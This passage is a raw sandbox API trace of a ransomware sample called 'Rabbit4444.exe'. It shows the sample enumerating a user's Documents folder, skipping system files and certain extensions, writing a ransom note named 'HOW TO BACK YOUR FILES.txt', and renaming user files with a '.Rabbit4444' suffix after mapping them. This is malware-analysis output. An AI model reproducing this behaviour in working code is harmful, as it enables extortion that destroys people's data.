(lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0049.618] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0049.618] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0049.618] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe6e5ce0c, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe6e5ce0c, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe6e699d8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0049.618] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.618] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0049.618] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x77f4cfd0, ftCreationTime.dwHighDateTime=0x1d4ccfa, ftLastAccessTime.dwLowDateTime=0x13e637e0, ftLastAccessTime.dwHighDateTime=0x1d4ca0c, ftLastWriteTime.dwLowDateTime=0x13e637e0, ftLastWriteTime.dwHighDateTime=0x1d4ca0c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D8mmMQeHMrSqYz8UevK", cAlternateFileName="D8MMMQ~1")) returned 1 [0049.618] lstrcmpiW (lpString1="D8mmMQeHMrSqYz8UevK", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.618] lstrcmpiW (lpString1="D8mmMQeHMrSqYz8UevK", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.618] lstrcmpiW (lpString1="D8mmMQeHMrSqYz8UevK", lpString2="Rabbit4444.exe") returned -1 [0049.618] lstrcmpiW (lpString1="D8mmMQeHMrSqYz8UevK", lpString2=".") returned 1 [0049.618] lstrcmpiW (lpString1="D8mmMQeHMrSqYz8UevK", lpString2="..") returned 1 [0049.618] lstrcmpiW (lpString1="D8mmMQeHMrSqYz8UevK", lpString2="windows") returned -1 [0049.618] lstrcmpiW (lpString1="D8mmMQeHMrSqYz8UevK", lpString2="bootmgr") returned 1 [0049.618] lstrcmpiW (lpString1="D8mmMQeHMrSqYz8UevK", lpString2="pagefile.sys") returned -1 [0049.618] lstrcmpiW (lpString1="D8mmMQeHMrSqYz8UevK", lpString2="boot") returned 1 [0049.618] lstrcmpiW (lpString1="D8mmMQeHMrSqYz8UevK", lpString2="ids.txt") returned -1 [0049.618] lstrcmpiW (lpString1="D8mmMQeHMrSqYz8UevK", lpString2="NTUSER.DAT") returned -1 [0049.619] lstrcpyW (in: lpString1=0x130eb90, lpString2="D8mmMQeHMrSqYz8UevK" | out: lpString1="D8mmMQeHMrSqYz8UevK") returned="D8mmMQeHMrSqYz8UevK" [0049.619] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf63a8 [0049.619] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x80) returned 0x101d98 [0049.619] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf63b0 | out: ListHead=0xf68b0, ListEntry=0xf63b0) returned 0xf6430 [0049.619] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd698c0e0, ftCreationTime.dwHighDateTime=0x1d4d4f8, ftLastAccessTime.dwLowDateTime=0x7aedbc40, ftLastAccessTime.dwHighDateTime=0x1d4c90f, ftLastWriteTime.dwLowDateTime=0x7aedbc40, ftLastWriteTime.dwHighDateTime=0x1d4c90f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EYPPTs4FJO", cAlternateFileName="EYPPTS~1")) returned 1 [0049.619] lstrcmpiW (lpString1="EYPPTs4FJO", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.619] lstrcmpiW (lpString1="EYPPTs4FJO", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.619] lstrcmpiW (lpString1="EYPPTs4FJO", lpString2="Rabbit4444.exe") returned -1 [0049.619] lstrcmpiW (lpString1="EYPPTs4FJO", lpString2=".") returned 1 [0049.619] lstrcmpiW (lpString1="EYPPTs4FJO", lpString2="..") returned 1 [0049.619] lstrcmpiW (lpString1="EYPPTs4FJO", lpString2="windows") returned -1 [0049.619] lstrcmpiW (lpString1="EYPPTs4FJO", lpString2="bootmgr") returned 1 [0049.619] lstrcmpiW (lpString1="EYPPTs4FJO", lpString2="pagefile.sys") returned -1 [0049.619] lstrcmpiW (lpString1="EYPPTs4FJO", lpString2="boot") returned 1 [0049.619] lstrcmpiW (lpString1="EYPPTs4FJO", lpString2="ids.txt") returned -1 [0049.619] lstrcmpiW (lpString1="EYPPTs4FJO", lpString2="NTUSER.DAT") returned -1 [0049.619] lstrcpyW (in: lpString1=0x130eb90, lpString2="EYPPTs4FJO" | out: lpString1="EYPPTs4FJO") returned="EYPPTs4FJO" [0049.619] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6408 [0049.619] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x6e) returned 0x117c98 [0049.619] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6410 | out: ListHead=0xf68b0, ListEntry=0xf6410) returned 0xf63b0 [0049.619] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd698c0e0, ftCreationTime.dwHighDateTime=0x1d4d4f8, ftLastAccessTime.dwLowDateTime=0x7aedbc40, ftLastAccessTime.dwHighDateTime=0x1d4c90f, ftLastWriteTime.dwLowDateTime=0x7aedbc40, ftLastWriteTime.dwHighDateTime=0x1d4c90f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EYPPTs4FJO", cAlternateFileName="EYPPTS~1")) returned 0 [0049.619] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0049.624] lstrcpyW (in: lpString1=0x130eb90, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0049.624] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0049.625] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0049.625] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0049.625] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.625] CloseHandle (hObject=0x278) returned 1 [0049.625] CloseHandle (hObject=0x27c) returned 1 [0049.625] GetCurrentThreadId () returned 0xd98 [0049.625] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6410 [0049.625] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO") returned="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO" [0049.625] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0049.625] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6408 | out: hHeap=0xe0000) returned 1 [0049.625] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO") returned="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO" [0049.625] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\") returned="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\" [0049.626] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\.BFC0E91B00AE8A0620D3" [0049.626] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\eyppts4fjo\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0049.630] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0049.634] FlushFileBuffers (hFile=0x27c) returned 1 [0049.635] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0049.635] CloseHandle (hObject=0x27c) returned 1 [0049.635] lstrlenW (lpString="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO") returned 54 [0049.635] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0049.636] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd698c0e0, ftCreationTime.dwHighDateTime=0x1d4d4f8, ftLastAccessTime.dwLowDateTime=0x7aedbc40, ftLastAccessTime.dwHighDateTime=0x1d4c90f, ftLastWriteTime.dwLowDateTime=0xe6e7f947, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0049.636] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.636] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.636] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0049.636] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0049.636] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd698c0e0, ftCreationTime.dwHighDateTime=0x1d4d4f8, ftLastAccessTime.dwLowDateTime=0x7aedbc40, ftLastAccessTime.dwHighDateTime=0x1d4c90f, ftLastWriteTime.dwLowDateTime=0xe6e7f947, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.636] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.636] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.636] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0049.636] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0049.636] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0049.636] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe6e7f947, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe6e7f947, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe6e7f947, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0049.636] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.636] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0049.636] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0361d0, ftCreationTime.dwHighDateTime=0x1d4caa7, ftLastAccessTime.dwLowDateTime=0x6b9d88a0, ftLastAccessTime.dwHighDateTime=0x1d4d059, ftLastWriteTime.dwLowDateTime=0x6b9d88a0, ftLastWriteTime.dwHighDateTime=0x1d4d059, nFileSizeHigh=0x0, nFileSizeLow=0x18fef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="b3 L_8Aww3.ods", cAlternateFileName="B3L_8A~1.ODS")) returned 1 [0049.636] lstrcmpiW (lpString1="b3 L_8Aww3.ods", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.636] lstrcmpiW (lpString1="b3 L_8Aww3.ods", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.636] lstrcmpiW (lpString1="b3 L_8Aww3.ods", lpString2="Rabbit4444.exe") returned -1 [0049.636] lstrcmpiW (lpString1="b3 L_8Aww3.ods", lpString2=".") returned 1 [0049.636] lstrcmpiW (lpString1="b3 L_8Aww3.ods", lpString2="..") returned 1 [0049.636] lstrcmpiW (lpString1="b3 L_8Aww3.ods", lpString2="windows") returned -1 [0049.636] lstrcmpiW (lpString1="b3 L_8Aww3.ods", lpString2="bootmgr") returned -1 [0049.636] lstrcmpiW (lpString1="b3 L_8Aww3.ods", lpString2="pagefile.sys") returned -1 [0049.636] lstrcmpiW (lpString1="b3 L_8Aww3.ods", lpString2="boot") returned -1 [0049.636] lstrcmpiW (lpString1="b3 L_8Aww3.ods", lpString2="ids.txt") returned -1 [0049.636] lstrcmpiW (lpString1="b3 L_8Aww3.ods", lpString2="NTUSER.DAT") returned -1 [0049.636] lstrcpyW (in: lpString1=0x130eba6, lpString2="b3 L_8Aww3.ods" | out: lpString1="b3 L_8Aww3.ods") returned="b3 L_8Aww3.ods" [0049.636] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\b3 L_8Aww3.ods", dwFileAttributes=0x0) returned 1 [0049.637] lstrlenW (lpString="b3 L_8Aww3.ods") returned 14 [0049.637] lstrlenW (lpString="Rabbit4444") returned 10 [0049.637] lstrcmpiW (lpString1="_8Aww3.ods", lpString2="Rabbit4444") returned -1 [0049.637] lstrlenW (lpString=".dll") returned 4 [0049.637] lstrcmpiW (lpString1=".ods", lpString2=".dll") returned 1 [0049.637] lstrlenW (lpString=".lnk") returned 4 [0049.637] lstrcmpiW (lpString1=".ods", lpString2=".lnk") returned 1 [0049.637] lstrlenW (lpString=".ini") returned 4 [0049.637] lstrcmpiW (lpString1=".ods", lpString2=".ini") returned 1 [0049.637] lstrlenW (lpString=".sys") returned 4 [0049.637] lstrcmpiW (lpString1=".ods", lpString2=".sys") returned -1 [0049.637] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\b3 L_8Aww3.ods" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\eyppts4fjo\\b3 l_8aww3.ods"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.637] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.637] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14094796882) returned 1 [0049.637] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=102383) returned 1 [0049.637] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0049.637] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101f30 [0049.637] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x192f0, lpName=0x0) returned 0x298 [0049.638] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x192f0) returned 0x70000 [0049.641] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.641] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0049.641] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.641] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0049.641] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.641] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0049.641] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.641] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0049.641] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14095184144) returned 1 [0049.641] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0049.641] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101f30 | out: hHeap=0xe0000) returned 1 [0049.641] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.642] CloseHandle (hObject=0x298) returned 1 [0049.642] CloseHandle (hObject=0x278) returned 1 [0049.643] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\b3 L_8Aww3.ods.Rabbit4444") returned 80 [0049.643] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\b3 L_8Aww3.ods" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\eyppts4fjo\\b3 l_8aww3.ods"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\b3 L_8Aww3.ods.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\eyppts4fjo\\b3 l_8aww3.ods.rabbit4444"), dwFlags=0x1) returned 1 [0049.643] InterlockedExchangeAdd (in: Addend=0xff618, Value=102384 | out: Addend=0xff618) returned 22523536 [0049.643] InterlockedExchangeAdd (in: Addend=0xff624, Value=3 | out: Addend=0xff624) returned 3631 [0049.643] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2afefe0, ftCreationTime.dwHighDateTime=0x1d4cbbb, ftLastAccessTime.dwLowDateTime=0xe3a06c70, ftLastAccessTime.dwHighDateTime=0x1d4cb2f, ftLastWriteTime.dwLowDateTime=0xe3a06c70, ftLastWriteTime.dwHighDateTime=0x1d4cb2f, nFileSizeHigh=0x0, nFileSizeLow=0xc1f0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="c9HUgPMn.rtf", cAlternateFileName="")) returned 1 [0049.643] lstrcmpiW (lpString1="c9HUgPMn.rtf", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.643] lstrcmpiW (lpString1="c9HUgPMn.rtf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.643] lstrcmpiW (lpString1="c9HUgPMn.rtf", lpString2="Rabbit4444.exe") returned -1 [0049.643] lstrcmpiW (lpString1="c9HUgPMn.rtf", lpString2=".") returned 1 [0049.643] lstrcmpiW (lpString1="c9HUgPMn.rtf", lpString2="..") returned 1 [0049.643] lstrcmpiW (lpString1="c9HUgPMn.rtf", lpString2="windows") returned -1 [0049.644] lstrcmpiW (lpString1="c9HUgPMn.rtf", lpString2="bootmgr") returned 1 [0049.644] lstrcmpiW (lpString1="c9HUgPMn.rtf", lpString2="pagefile.sys") returned -1 [0049.644] lstrcmpiW (lpString1="c9HUgPMn.rtf", lpString2="boot") returned 1 [0049.644] lstrcmpiW (lpString1="c9HUgPMn.rtf", lpString2="ids.txt") returned -1 [0049.644] lstrcmpiW (lpString1="c9HUgPMn.rtf", lpString2="NTUSER.DAT") returned -1 [0049.644] lstrcpyW (in: lpString1=0x130eba6, lpString2="c9HUgPMn.rtf" | out: lpString1="c9HUgPMn.rtf") returned="c9HUgPMn.rtf" [0049.644] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\c9HUgPMn.rtf", dwFileAttributes=0x0) returned 1 [0049.644] lstrlenW (lpString="c9HUgPMn.rtf") returned 12 [0049.644] lstrlenW (lpString="Rabbit4444") returned 10 [0049.644] lstrcmpiW (lpString1="HUgPMn.rtf", lpString2="Rabbit4444") returned -1 [0049.644] lstrlenW (lpString=".dll") returned 4 [0049.644] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0049.644] lstrlenW (lpString=".lnk") returned 4 [0049.644] lstrcmpiW (lpString1=".rtf", lpString2=".lnk") returned 1 [0049.644] lstrlenW (lpString=".ini") returned 4 [0049.644] lstrcmpiW (lpString1=".rtf", lpString2=".ini") returned 1 [0049.644] lstrlenW (lpString=".sys") returned 4 [0049.644] lstrcmpiW (lpString1=".rtf", lpString2=".sys") returned -1 [0049.644] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\c9HUgPMn.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\eyppts4fjo\\c9hugpmn.rtf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.644] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.644] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14095510972) returned 1 [0049.644] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=49648) returned 1 [0049.644] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0049.644] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0049.645] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc4f0, lpName=0x0) returned 0x298 [0049.645] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc4f0) returned 0x70000 [0049.646] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.646] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0049.646] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.646] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0049.646] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.646] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0049.646] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.646] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0049.646] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14095721476) returned 1 [0049.647] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0049.647] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0049.647] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.647] CloseHandle (hObject=0x298) returned 1 [0049.647] CloseHandle (hObject=0x278) returned 1 [0049.648] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\c9HUgPMn.rtf.Rabbit4444") returned 78 [0049.648] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\c9HUgPMn.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\eyppts4fjo\\c9hugpmn.rtf"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\c9HUgPMn.rtf.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\eyppts4fjo\\c9hugpmn.rtf.rabbit4444"), dwFlags=0x1) returned 1 [0049.648] InterlockedExchangeAdd (in: Addend=0xff618, Value=49648 | out: Addend=0xff618) returned 22625920 [0049.648] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3634 [0049.648] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1dbeef60, ftCreationTime.dwHighDateTime=0x1d4d1c2, ftLastAccessTime.dwLowDateTime=0x2391fcd0, ftLastAccessTime.dwHighDateTime=0x1d4c9c4, ftLastWriteTime.dwLowDateTime=0x2391fcd0, ftLastWriteTime.dwHighDateTime=0x1d4c9c4, nFileSizeHigh=0x0, nFileSizeLow=0x465b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="h_uO.xls", cAlternateFileName="")) returned 1 [0049.648] lstrcmpiW (lpString1="h_uO.xls", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.648] lstrcmpiW (lpString1="h_uO.xls", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.648] lstrcmpiW (lpString1="h_uO.xls", lpString2="Rabbit4444.exe") returned -1 [0049.648] lstrcmpiW (lpString1="h_uO.xls", lpString2=".") returned 1 [0049.648] lstrcmpiW (lpString1="h_uO.xls", lpString2="..") returned 1 [0049.649] lstrcmpiW (lpString1="h_uO.xls", lpString2="windows") returned -1 [0049.649] lstrcmpiW (lpString1="h_uO.xls", lpString2="bootmgr") returned 1 